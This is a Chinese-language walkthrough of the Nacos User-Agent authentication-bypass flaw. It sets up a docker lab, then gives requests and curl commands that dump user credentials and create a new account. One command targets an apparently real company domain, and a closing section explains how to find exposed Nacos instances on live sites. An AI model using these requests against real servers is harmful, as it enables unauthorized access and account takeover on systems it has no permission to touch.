目录
nacos:Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。
漏洞描述
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作
影响版本
- <= Nacos 2.0.0-ALPHA.1
- < Nacos 1.4.1
docker-compose文件一键搭建漏洞环境
使用nacos1.4.0版本(1.4.1不存在漏洞)的环境
下载并安装docker
docker-compose.yml文件内容如下
version: '3'
services:
nacos:
restart: always
image: nacos/nacos-server:1.4.0
container_name: nacos
ports:
- 8848:8848
environment:
MODE: standalone
执行docker-compose up -d启动漏洞环境
访问 http://192.168.xx.xx:8848/nacos/#/login
默认用户名密码 nacos,nacos
漏洞复现
1. 访问用户列表接口
http://192.168.1.5:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9
或者使用curl工具
curl -XGET 'http://192.168.1.5:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9'
如出现下面的所示的页面,列出了所有登录的账号和密码说明存在漏洞
2. 向服务器添加一个新的账号和密码
访问nacos/v1,截取请求包,将GET请求换为POST,User-Agent值修改为:Nacos-Server
服务器返回创建用户成功
或者使用curl工具
curl -XPOST 'https://lingting.mininglamp.com/nacos/v1/auth/users?username=test&password=test'
3. 再次查看用户列表,发现多了一个我们添加的账户
4. 用创建的账号进行登录
修复建议
升级至最新版
漏洞挖掘
在最近的一次真实的渗透测试中发现了这个漏洞,其部署在阿里云系统上,那如何来发现这个漏洞了
1. 可以在网站域名如.com后面拼接nacos,查看有没有nacos这个服务
2. 再访问用户接口列表查看,若没有漏洞则为这样,状态码为401